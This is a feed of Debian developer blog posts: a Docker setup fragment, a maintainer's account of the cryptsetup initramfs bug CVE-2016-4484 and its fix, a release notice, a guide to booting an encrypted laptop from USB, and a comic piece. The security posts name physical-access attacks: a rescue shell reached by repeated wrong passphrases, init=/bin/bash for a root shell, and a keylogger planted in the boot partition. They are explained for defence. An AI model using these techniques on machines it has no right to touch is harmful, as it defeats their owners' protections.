 OS/Arch:      linux/amd64

Server:
 Version:      1.12.3
 API version:  1.24
 Go version:   go1.6.3
 Git commit:   6b644ec
 Built:        Wed Oct 26 21:45:16 2016
 OS/Arch:      linux/amd64

$ sudo usermod -aG docker "$(id -un)"

(Reboot or logout/login to update your session to include docker group membership and thus no longer require sudo for using docker commands.)

Hope this is useful to someone! If nothing else, it’ll serve as a concise single-page reference for future-tianon. 😇

07 December, 2016 07:00AM by Tianon Gravi ([email protected])

Jonas Meurer

On CVE-2016-4484, a (securiy)? bug in the cryptsetup initramfs integration

On CVE-2016-4484, a (security)? bug in the cryptsetup initramfs integration

On November 4, I was made aware of a security vulnerability in the integration of cryptsetup into initramfs. The vulnerability was discovered by security researchers Hector Marco and Ismael Ripoll of CyberSecurity UPV Research Group and got CVE-2016-4484 assigned.

In this post I'll try to reflect a bit on

What CVE-2016-4484 is all about

Basically, the vulnerability is about two separate but related issues:

1. Initramfs rescue shell considered harmful

The main topic that Hector Marco and Ismael Ripoll address in their publication is that Debian exits into a rescue shell in case of failure during initramfs, and that this can be triggered by entering a wrong password ~93 times in a row.

Indeed the Debian initramfs implementation as provided by initramfs-tools exits into a rescue shell (usually a busybox shell) after a defined amount of failed attempts to make the root filesystem available. The loop in question is in local_device_setup() at the local initramfs script

In general, this behaviour is considered as a feature: if the root device hasn't shown up after 30 rounds, the rescue shell is spawned to provide the local user/admin a way to debug and fix things herself.

Hector Marco and Ismael Ripoll argue that in special environments, e.g. on public computers with password protected BIOS/UEFI and bootloader, this opens an attack vector and needs to be regarded as a security vulnerability:

It is common to assume that once the attacker has physical access to the computer, the game is over. The attackers can do whatever they want. And although this was true 30 years ago, today it is not.

There are many "levels" of physical access. [...]

In order to protect the computer in these scenarios: the BIOS/UEFI has one or two passwords to protect the booting or the configuration menu; the GRUB also has the possibility to use multiple passwords to protect unauthorized operations.

And in the case of an encrypted system, the initrd shall block the maximum number of password trials and prevent the access to the computer in that case.

While Hector and Ismael have a valid point in that the rescue shell might open an additional attack vector in special setups, this is not true for the vast majority of Debian systems out there: in most cases a local attacker can alter the boot order, replace or add boot devices, modify boot options in the (GNU GRUB) bootloader menu or modify/replace arbitrary hardware parts.

The required scenario to make the initramfs rescue shell an additional attack vector is indeed very special: locked down hardware, password protected BIOS and bootloader but still local keyboard (or serial console) access are required at least.

Hector and Ismael argue that the default should be changed for enhanced security:

[...] But then Linux is used in more hostile environments, this helpful (but naive) recovery services shall not be the default option.

For the reasons explained about, I tend to disagree to Hectors and Ismaels opinion here. And after discussing this topic with several people I find my opinion reconfirmed: the Debian Security Team disputes the security impact of the issue and others agree.

But leaving the disputable opinion on a sane default aside, I don't think that the cryptsetup package is the right place to change the default, if at all. If you want added security by a locked down initramfs (i.e. no rescue shell spawned), then at least the bootloader (GNU GRUB) needs to be locked down by default as well.

To make it clear: if one wants to lock down the boot process, bootloader and initramfs should be locked down together. And the right place to do this would be the configurable behaviour of grub-mkconfig. Here, one can set a password for GRUB and the boot parameter 'panic=1' which disables the spawning of a rescue shell in initramfs.

But as mentioned, I don't agree that this would be sane defaults. The vast majority of Debian systems out there don't have any security added by locked down bootloader and initramfs and the benefit of a rescue shell for debugging purposes clearly outrivals the minor security impact in my opinion.

For the few setups which require the added security of a locked down bootloader and initramfs, we already have the relevant options documented in the Securing Debian Manual:

After discussing the topic with initramfs-tools maintainers today, Guilhem and me (the cryptsetup maintainers) finally decided to not change any defaults and just add a 'sleep 60' after the maximum allowed attempts were reached.

2. tries=n option ignored, local brute-force slightly cheaper

Apart from the issue of a rescue shell being spawned, Hector and Ismael also discovered a programming bug in the cryptsetup initramfs integration. This bug in the cryptroot initramfs local-top script allowed endless retries of passphrase input, ignoring the tries=n option of crypttab (and the default of 3). As a result, theoretically unlimited attempts to unlock encrypted disks were possible when processed during initramfs stage. The attack vector here was that local brute-force attacks are a bit cheaper. Instead of having to reboot after max tries were reached, one could go on trying passwords.

Even though efficient brute-force attacks are mitigated by the PBKDF2 implementation in cryptsetup, this clearly is a real bug.

The reason for the bug was twofold:

  • First, the condition in setup_mapping() responsible for making the function fail when the maximum amount of allowed attempts is reached, was never met:

    setup_mapping()
    {
      [...]
      # Try to get a satisfactory password $crypttries times
      count=0                              
    while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do export CRYPTTAB_TRIED="$count" count=$(( $count + 1 )) [...] done if [ $crypttries -gt 0 ] && [ $count -gt $crypttries ]; then message "cryptsetup: maximum number of tries exceeded for $crypttarget" return 1 fi [...] }

    As one can see, the while loop stops when $count -lt $crypttries. Thus the second condition $count -gt $crypttries is never met. This can easily be fixed by decreasing $count by one in case of a successful unlock attempt along with changing the second condition to $count -ge $crypttries:

    setup_mapping()
    {
      [...]
      while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do
          [...]
          # decrease $count by 1, apparently last try was successful.
          count=$(( $count - 1 ))
          [...]
      done
      if [ $crypttries -gt 0 ] && [ $count -ge $crypttries ]; then
          [...]
      fi
      [...]
    }
    

    Christian Lamparter already spotted this bug back in October 2011 and provided a (incomplete) patch, but back then I even managed to merge the patch in an improper way, making it even more useless: The patch by Christian forgot to decrease $count by one in case of a successful unlock attempt, resulting in warnings about maximum tries exceeded even for successful attemps in some circumstances. But instead of adding the decrease myself and keeping the (almost correct) condition $count -eq $crypttries for detection of exceeded maximum tries, I changed back the condition to the wrong original $count -gt $crypttries that again was never met. Apparently I didn't test the fix properly back then. I definitely should do better in future!

  • Second, back in December 2013, I added a cryptroot initramfs local-block script as suggested by Goswin von Brederlow in order to fix bug #678692. The purpose of the cryptroot initramfs local-block script is to invoke the cryptroot initramfs local-top script again and again in a loop. This is required to support complex block device stacks.

    In fact, the numberless options of stacked block devices are one of the biggest and most inglorious reasons that the cryptsetup initramfs integration scripts became so complex over the years. After all we need to support setups like rootfs on top of LVM with two separate encrypted PVs or rootfs on top of LVM on top of dm-crypt on top of MD raid.

    The problem with the local-block script is that exiting the setup_mapping() function merely triggers a new invocation of the very same function.

    The guys who discovered the bug suggested a simple and good solution to this bug: When maximum attempts are detected (by second condition from above), the script sleeps for 60 seconds. This mitigates the brute-force attack options for local attackers - even rebooting after max attempts should be faster.

About disclosure, wording and clickbaiting

I'm happy that Hector and Ismael brought up the topic and made their argument about the security impacts of an initramfs rescue shell, even though I have to admit that I was rather astonished about the fact that they got a CVE assigned.

Nevertheless I'm very happy that they informed the Security Teams of Debian and Ubuntu prior to publishing their findings, which put me in the loop in turn. Also Hector and Ismael were open and responsive when it came to discussing their proposed fixes.

But unfortunately the way they advertised their finding was not very helpful. They announced a speech about this topic at the DeepSec 2016 in Vienna with the headline Abusing LUKS to Hack the System.

Honestly, this headline is missleading - if not wrong - in several ways:

  • First, the whole issue is not about LUKS, neither is it about cryptsetup itself. It's about Debians integration of cryptsetup into the initramfs, which is a compeletely different story.
  • Second, the term hack the system suggests that an exploit to break into the system is revealed. This is not true. The device encryption is not endangered at all.
  • Third - as shown above - very special prerequisites need to be met in order to make the mere existance of a LUKS encrypted device the relevant fact to be able to spawn a rescue shell during initramfs.

Unfortunately, the way this issue was published lead to even worse articles in the tech news press. Topics like Major security hole found in Cryptsetup script for LUKS disk encryption or Linux Flaw allows Root Shell During Boot-Up for LUKS Disk-Encrypted Systems suggest that a major security vulnerabilty was revealed and that it compromised the protection that cryptsetup respective LUKS offer.

If these articles/news did anything at all, then it was causing damage to the cryptsetup project, which is not affected by the whole issue at all.

After the cat was out of the bag, Marco and Ismael aggreed that the way the news picked up the issue was suboptimal, but I cannot fight the feeling that the over-exaggeration was partly intended and that clickbaiting is taking place here. That's a bit sad.

07 December, 2016 01:53AM

December 06, 2016

hackergotchi for Sylvain Le Gall

Sylvain Le Gall

Release of OASIS 0.4.8

I am happy to announce the release of OASIS v0.4.8.

Logo OASIS small

OASIS is a tool to help OCaml developers to integrate configure, build and install systems in their projects. It should help to create standard entry points in the source code build system, allowing external tools to analyse projects easily.

This tool is freely inspired by Cabal which is the same kind of tool for Haskell.

You can find the new release here and the changelog here. More information about OASIS in general on the OASIS website.

Pull request for inclusion in OPAM is pending.

Here is a quick summary of the important changes:

  • Fix various problems of parsing present in OASIS 0.4.7 (extraneous whitespaces, handling of ocamlbuild argument...)
  • Enable creation of OASIS plugin and OASIS command line plugin.
  • Various fixes for the plugin "omake".
  • Create 2 branches to pin OASIS with OPAM, making easier for contributor to test dev. version.

Thanks to Edwin Török, Yuri D. Lensky and Gerd Stolpmann for their contributions.

06 December, 2016 11:17PM by gildor

hackergotchi for Mirco Bauer

Mirco Bauer

Secure USB boot with Debian

Foreword

The moment you leave your laptop, say in a hotel room, you can no longer trust your system as it could have been modified while you were away. Think you are safe because you have a crypted disk? Well, if the boot partition is on the laptop itself, it can be manipulated and you will not notice because the boot partition can't be encrypted. The BIOS needs to access the MBR and boot loader and that loads the Linux kernel, all unencrypted. There has been some reports lately that the Linux cryptsetup is insecure because you can spawn a root shell by hitting the enter key for 70 seconds. This is not the real threat to your system, really. If someone has physical access to your hardware, he can get a root shell in less than a second by passing init=/bin/bash as parameter to the Linux kernel in the boot loader regardless if cryptsetup is used or not! The attacker can also use other ways like booting a live system from CD/USB etc. The real insecurity here is the unencrypted boot partition and not some script that gets executed from it. So how to prevent this physical access attack vector? Just keep reading this guide.

This guide explains how to install Debian securely on your laptop with using an external USB boot disk. The disk inside the laptop should not contain your /boot partition since that is an easy target for manipulation. An attacker could for example change the boot scripts inside the initrd image to capture your passphrase of your crypted volume. With an USB boot partition, you can unplug the USB stick after the operating system has booted. Best practice here is to have the USB stick together with your bunch of keys. That way you will disconnect your USB stick early after the boot as finished so you can put it back into your pocket.

Secure Hardware Assumptions

We have to assume here that the hardware you are using to download and verify the install media is safe to use. Same applies with the hardware where you are doing the fresh Debian install. Say the hardware does not contain any malware in the form of code in EFI or other manipulation attempts that influence the behavior of the operating system we are going to install.

Download Debian Install ISO

Feel free to use any Debian mirror and install flavor. For this guide I am using the download mirror in Germany and the DVD install flavor.

wget http://ftp.de.debian.org/debian-cd/current/amd64/iso-dvd/debian-8.6.0-amd64-DVD-1.iso

Verify hashsum of ISO file

To know if the ISO file was downloaded without modification we have to check the hashsum of the file. The hashsum file can be found in the same directory as the ISO file on the download mirror. With hashsums if a single bit differs in the file, the resulting SHA512 sum will be completely different.

Obtain the hashsum file using:

wget http://ftp.de.debian.org/debian-cd/current/amd64/iso-dvd/SHA512SUMS

Calculate a local hashsum from the downloaded ISO file:

sha512sum debian-8.6.0-amd64-DVD-1.iso

Now you need to compare the hashsum with that is in the SHA512SUMS file. Since the SHA512SUMS file contains the hashsums of all files that are in the same directory you need to find the right one first. grep can do this for you:

grep debian-8.6.0-amd64-DVD-1.iso SHA512SUMS

Both commands executed after each other should show following output:

$ sha512sum debian-8.6.0-amd64-DVD-1.iso
c3883edfc95e3b09152d46ce29a032eed1de71531549aee86bb98dab1528088a16f0b4d628aee8ac6cc420364e208d3d5e19d0dea3576f53b904c18e8f604d8c  debian-8.6.0-amd64-DVD-1.iso
$ grep debian-8.6.0-amd64-DVD-1.iso SHA512SUMS
c3883edfc95e3b09152d46ce29a032eed1de71531549aee86bb98dab1528088a16f0b4d628aee8ac6cc420364e208d3d5e19d0dea3576f53b904c18e8f604d8c  debian-8.6.0-amd64-DVD-1.iso

As you can see the hashsum found in the SHA512SUMS file matches with the locally generated hashsum using the sha512sum command.

At this point we are not finished yet. These 2 matching hashsums just means whatever was on the download server matches what we have received and stored locally on your disk. The ISO file and SHA512SUM file could still be a modified version!

And this is where GPG signatures chime in, covered in the next section.

Download GPG Signature File

GPG signature files usually have the .sign file name extension but could also be named .asc. Download the signature file using wget:

wget http://ftp.de.debian.org/debian-cd/current/amd64/iso-dvd/SHA512SUMS.sign

Obtain GPG Key of Signer

Letting gpg verify the signature will fail at this point as we don't have the public key of the signer:

$ gpg --verify SHA512SUMS.sign
gpg: assuming signed data in 'SHA512SUMS'
gpg: Signature made Mon 19 Sep 2016 12:23:47 AM HKT
gpg:                using RSA key DA87E80D6294BE9B
gpg: Can't check signature: No public key

Downloading a key is trivial with gpg, but more importantly we need to verify that this key (DA87E80D6294BE9B) is trustworthy, as it could also be a key of the infamous man-in-the-middle.

Here you can find the GPG fingerprints of the official signing keys used by Debian. The ending of the "Key fingerprint" line should match the key id we found in the signature file from above.

gpg:                using RSA key DA87E80D6294BE9B

Key fingerprint = DF9B 9C49 EAA9 2984 3258  9D76 DA87 E80D 6294 BE9B

DA87E80D6294BE9B matches Key fingerprint = DF9B 9C49 EAA9 2984 3258 9D76 DA87 E80D 6294 BE9B

To download and import this key run:

$ gpg --keyserver keyring.debian.org --recv-keys DA87E80D6294BE9B

Verify GPG Signature of Hashsum File

Ok, we are almost there. Now we can run the command which checks if the signature of the hashsum file we have, was not modified by anyone and matches what Debian has generated and signed.

gpg: assuming signed data in 'SHA512SUMS'
gpg: Signature made Mon 19 Sep 2016 12:23:47 AM HKT
gpg:                using RSA key DA87E80D6294BE9B
gpg: checking the trustdb
gpg: marginals needed: 3  completes needed: 1  trust model: pgp
gpg: depth: 0  valid:   1  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: Good signature from "Debian CD signing key <[email protected]>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: DF9B 9C49 EAA9 2984 3258  9D76 DA87 E80D 6294 BE9B

The important line in this output is the "Good signature from ..." one. It still shows a warning since we never certified (signed) that Debian key. This can be ignored at this point though.

Write ISO Image to Install Media

With a verified pristine ISO file we can finally start the install by writing it to an USB stick or blank DVD. So use your favorite tool to write the ISO to your install media and boot from it. I have used dd and a USB stick attached as /dev/sdb.

dd if=debian-8.6.0-amd64-DVD-1.iso of=/dev/sdb bs=1M oflag=sync

Install Debian on Crypted Volume with USB boot partition

I am not explaining each step of the Debian install here. The Debian handbook is a good resource for covering each install step.

Follow the steps until the installers wants to partition your disk.

There you need to select the "Guided, use entire disk and set up encrypted LVM" option. After that select the built-in disk of your laptop, which usually is sda but double check this before you go ahead, as it will overwrite the data! The 137 GB disk in this case is the built-in disk and the 8 GB is the USB stick.

It makes no difference at this point if you select "All files in one partition" or "Separate /home partition". The USB boot partition can be selected a later step.

Confirm that you want to overwrite your built-in disk shown as sda. It will take a while as it will write random data to the disk to ensure there is no unencrypted data left on the disk from previous installations for example.

Now you need to enter your passphrase that will be used to protect the private key of the crypt volume. Choose something long enough like a sentence and don't forget the passphrase else you can no longer access your data! Don't save the passphrase on any computer, smartphone or password manager. If you want to make a backup of your passphrase then use a ball pen and paper and store the paper backup in a secure location.

The installer will show you a summary of the partitioning as shown above but we need to make the change for the USB boot disk. At the moment it wants to put /boot on sda which is the built-in disk, while our USB stick is sdb. Select /boot and hit enter, after that select "Delete this partition".

After /boot was deleted we can create /boot on the USB stick shown as sdb. Select sdb and hit enter. It will ask if you want to create an empty partition table. Confirm that question with yes.

The partition summary shows sdb with no partitions on it. Select FREE SPACE and select "Create a new partition". Confirm the suggested partition size. Confirm the partition type to be "Primary".

It is time to tell the installer to use this new partition on the USB stick (sdb1) as /boot partition. Select "Mount point: /home" and in the next dialog select "/boot - static files of the boot loader" as shown below:

Confirm the made changes by selecting "Done setting up the partition".

The final partitioning should look now like the following screenshot:

If the partition summary looks good, go ahead with the installation by selecting "Finish partitioning and write changes to disk".

When the installer asks if it should force EFI, then select no, as EFI is not going to protect you.

Finish the installation as usual, select your preferred desktop environment etc.

GRUB Boot Loader

Confirm the dialog that wants to install GRUB to the master boot record. Here it is important to install it to the USB stick and not your built-in SATA/SSD disk! So select sdb (the USB stick) in the next dialog.

First Boot from USB

Once everything is installed, you can boot from your USB stick. As simple test you can unplug your USB stick and the boot should fail with "no operating system found" or similar error message from the BIOS. If it doesn't boot even though the USB stick is connected, then most likely your BIOS is not configured to boot from USB media. Also a blank screen and nothing happening is usually meaning the BIOS can't find a boot device. You need to change the boot setting in your BIOS. As the steps are very different for each BIOS, I can't provide a detailed step-by-step list here.

Usually you can enter the BIOS using F1, F2 or F12 after powering on your computer. In the BIOS there is a menu to configure the boot order. In that list it should show USB disk/storage as the first position. After you have made the changes save and exit the BIOS. Now it will boot from your USB stick first and GRUB will show up and proceeds with the boot process till it will ask for your passphrase to unlock the crypt volume.

Unmount /boot partition after Boot

If you boot your laptop from the USB stick, we want to remove the stick after it has finished booting. This will prevent an attacker to make modifications to your USB stick. To avoid data loss, we should not simply unplug the USB stick but unmount /boot first and then unplug the stick. Good news is that we can automate this unmounting and you just need to unplug the stick after the laptop has finished booting to your login screen.

Just add this line to your /etc/rc.local file:

umount /boot

After boot you can once verify that it automatically unmounts /boot for you by running:

mount | grep /boot

If that command produces no output, then /boot is not mounted and you can safely unplug the USB stick.

Final Words

From time to time you need to upgrade your Linux kernel of course which is on the /boot partition. This can still be done the regular way using apt-get upgrade, except that you need to mount /boot before that and unmount it again after the kernel upgrade.

Enjoy your secured laptop. Now you can leave it in a hotel room without the possibility of someone trying you obtain your passphrase by putting a key logger in your boot partition. All the attacker will see is a fully encrypted harddisk. If he tries to mess with your crypted disk, you will notice as the decryption will fail.

Disclaimer: there are still other attack vectors possible, but they are much harder to do. Your hardware or BIOS can still be modified. But not by holding down the enter key for 70 seconds or by booting a live system.

06 December, 2016 01:28PM

December 05, 2016

hackergotchi for Shirish Agarwal

Shirish Agarwal

The Anti-Pollito squad – arrest and confession

Disclaimer – This is an attempt at humor and hence entirely fictional in nature. While some incidents depicted are true, the context and the story woven around them are by yours truly. None of the Mascots of Debian were hurt during the blog post😉. I also disavow any responsibility for any hurt (real or imagined) to any past, current and future mascots. The attempt should not be looked upon as demeaning people who are accused of false crimes, tortured and confessions eked out of them as this happens quite a lot (In India for sure, but guess it’s the same world over in various degrees). The idea is loosely inspired by Chocolate:Deep Dark Secrets. (2005)

On a more positive note, let’s start –

Being a Sunday morning woke up late to find incessant knocking on the door, incidentally mum was not at home. Opening the door, found two official looking gentleman. They asked my name, asked my credentials, tortured and arrested me for “Group conspiracy of Malicious Mischief in second and third degrees” .

The torture was done by means of making me forcefully watch endless reruns of ‘Norbit‘ . While I do love Eddie Murphy, this was one of his movies he could have done without😦. I guess for many people watching it once was torture enough. I *think* they were nominated for razzie awards dunno if they won it or not, but this is beside the point.

Unlike the 20 years it takes for a typical case to reach to its conclusion even in the smallest court in India, due to the torture, I was made to confess (due to endless torture) and was given summary judgement. The judgement was/is as follows –

a. Do 100 hours of Community service in Debian in 2017. This could be done via blog posts, raising tickets in the Debian BTS or in whichever way I could be helpful to Debian.

b. Write a confessional with some photographic evidence sharing/detailing some of the other members who were part of the conspiracy in view of the reduced sentence.

So now, have been forced to write this confession –

As you all know, I won a bursary this year for debconf16. What is not known by most people is that I also got an innocuous looking e-mail titled ‘ Pollito for DPL ‘. While I can’t name all the names as investigation is still ongoing about how far-reaching the conspiracy is . The email was purportedly written by members of ‘cabal within cabal’ which are in Debian. I looked at the email header to see if this was genuine and I could trace the origin but was left none the wiser, as obviously these people are far more technically advanced than to fall in simple tricks like this –

Anyways, secretly happy that I have been invited to be part of these elites, I did the visa thing, packed my bags and came to Debconf16.

At this point in juncture, I had no idea whether it was real or I had imagined the whole thing. Then to my surprise saw this –

evidence of conspiracy to have Pollito as DPL, Wifi Password

Just like the Illuminati the conspiracy was for all to see those who knew about it. Most people were thinking of it as a joke, but those like me who had got e-mails knew better. I knew that the thing is real, now I only needed to bide my time and knew that the opportunity would present itself.

And few days later, sure enough, there was a trip planned for ‘Table Mountain, Cape Town’ . Few people planned to hike to the mountain, while few chose to take the cable car till up the mountain.

First glance of the cable car with table mountain as background

Quite a few people came along with us and bought tickets for the to and fro to the mountain and back.

Ticket for CPT Table mountain car cable

Incidentally, I was thinking if the South African Govt. were getting the tax or not. If you look at the ticket, there is just a bar-code. In India as well as the U.S. there is TIN – Tax Identification Number –

TIN displayed on an invoice from channeltimes.com

Few links to share what it is all about . While these should be on all invoices, need to specially check when taking high-value items. In India as shared in the article the awareness, knowledge leaves a bit to be desired. While I’m drifting from the incident, it would be nice if somebody from SA could share how things work there.

Moving on, we boarded the cable car. It was quite spacious cable car with I guess around 30-40 people or some more who were able to see everything along with the controller.

from inside the table mountain cable car 360 degrees

It was a pleasant cacophony of almost two dozen or more nationalities on this 360 degrees moving chamber. I was a little worried though as it essentially is a bucket and there is always a possibility that a severe wind could damage it. Later somebody did share that some frightful incidents had occurred not too long ago on the cable car.

It took about 20-25 odd minutes to get to the top of table mountain and we were presented with views such as below –

View from Table Mountain cable car looking down

The picture I am sharing is actually when we were going down as all the pictures of going up via the cable car were over-exposed. Also, it was pretty crowded on the way up then on the way down so handling the mobile camera was not so comfortable.

Once we reached up, the wind was blowing at incredible speeds. Even with my jacket and everything I was feeling cold. Most of the group around 10-12 people looked around if we could find a place to have some refreshments and get some of the energy in the body. So we all ventured to a place and placed our orders –

the bleh... Irish coffee at top of Table Mountain

I was introduced to Irish Coffee few years back and have had some incredible Irish Coffees in Pune and elsewhere. I do hope to be able to make Irish Coffee at home if and when I have my own house. This is hotter than brandy and is perfect if you are suffering from cold etc if done right, really needs some skills. This is the only drink which I wanted in SA which I never got right😦 . As South Africa was freezing for me, this would have been the perfect antidote but the one there as well as elsewhere were all …bleh.

What was interesting though, was the coffee caller besides it. It looked like a simple circuit mounted on a PCB board with lights, vibrations and RFID and it worked exactly like that. I am guessing as and when the order is ready, there is an interrupt signal sent via radio waves which causes the buzzer to light and vibrate. Here’s the back panel if somebody wants to take inspiration and try it as a fun project –

backpanel of the buzz caller

Once we were somewhat strengthened by the snacks, chai, coffee etc. we made our move to seeing the mountain. The only way to describe it is that it’s similar to Raigad Fort but the plateau seemed to be bigger. The wikipedia page of Table Mountain attempts to share but I guess it’s more clearly envisioned by one of the pictures shared therein.

table mountain panaromic image

I have to say while Table Mountain is beautiful and haunting as it has scenes like these –

Some of the oldest rocks known to wo/man.

There is something there which pulls you, which reminds you of a long lost past. I could have simply sat there for hours together but as was part of the group had to keep with them. Not that I minded.

The moment I was watching this, I was transported to some memories of the Himalayas about 20 odd years or so. In that previous life, I had the opportunity to be with some of the most beautiful women and also been in the most happening places, the Himalayas. I had shared years before some of my experiences I had in the Himalayas. I discontinued it as I didn’t have a decent camera at that point in time. While I don’t wanna digress, I would challenge anybody to experience the Himalayas and then compare. It is just something inexplicable. The beauty and the rawness that Himalayas shows makes you feel insignificant and yet part of the whole cosmos. What Paulo Cohello expressed in The Valkyries is something that could be felt in the Himalayas. Leh, Ladakh, Himachal , Garwhal, Kumaon. The list will go on forever as there are so many places, each more beautiful than the other. Most places are also extremely backpacker-friendly so if you ask around you can get some awesome deals if you want to spend more than a few days in one place.

Moving on, while making small talk @olasd or Nicolas Dandrimont , the headmaster of our trip made small talk to each of us and eked out from all of us that we wanted to have Pollito as our DPL (Debian Project Leader) for 2017. Few pictures being shared below as supporting evidence as well –

The Pollito as DPL cabal in action

members of the Pollito as DPL

where am I or more precisely how far am I from India.

While I do not know who further up than Nicolas was on the coup which would take place. The idea was this –

If the current DPL steps down, we would take all and any necessary actions to make Pollito our DPL.

Pollito going to SA - photo taken by Jonathan Carter This has been taken from Pollito’s adventure

Being a responsible journalist, I also enquired about Pollito’s true history as it would not have been complete without one. This is the e-mail I got from Gunnar Wolf, a friend and DD from Mexico🙂

Turns out, Valessio has just spent a week staying at my house🙂 And
in any case, if somebody in Debian knows about Pollito’s
childhood… That is me.

Pollito came to our lives when we went to Congreso Internacional de
Software Libre (CISOL) in Zacatecas city. I was strolling around the
very beautiful city with my wife Regina and our friend Alejandro
Miranda, and at a shop at either Ramón López Velarde or Vicente
Guerrero, we found a flock of pollitos.

http://www.openstreetmap.org/#map=17/22.77111/-102.57145

Even if this was comparable to a slave market, we bought one from
them, and adopted it as our own.

Back then, we were a young couple… Well, we were not that young
anymore. I mean, we didn’t have children. Anyway, we took Pollito with
us on several road trips, such as the only time I have crossed an
international border driving: We went to Encuentro Centroamericano de
Software Libre at Guatemala city in 2012 (again with Alejandro), and
you can see several Pollito pics at:

http://gwolf.org/album/road-trip-ecsl-2012-guatemala-0

Pollito likes travelling. Of course, when we were to Nicaragua for
DebConf, Pollito tagged along. It was his first flight as a passenger
(we never asked about his previous life in slavery; remember, Pollito
trust no one).

Pollito felt much welcome with the DebConf crowd. Of course, as
Pollito is a free spirit, we never even thought about forcing him to
come back with us. Pollito went to Switzerland, and we agreed to meet
again every year or two. It’s always nice to have a chat with him.

Hugs!

So with that backdrop I would urge fellow Debianities to take up the slogans –

LONG LIVE THE DPL !

LONG LIVE POLLITO !

LONG LIVE POLLITO THE DPL !

The first step to make Pollito the DPL is to ensure he has a @debian.org ([email protected])

We also need him to be made a DD because only then can he become a DPL.

In solidarity and in peace🙂


Filed under: Miscellenous Tagged: #caller, #confession, #Debconf16, #debian, #Fiction, #history, #Pollito, #Pollito as DPL, #Table Mountain, Cabal, memories, south africa

05 December, 2016 05:01PM by shirishag75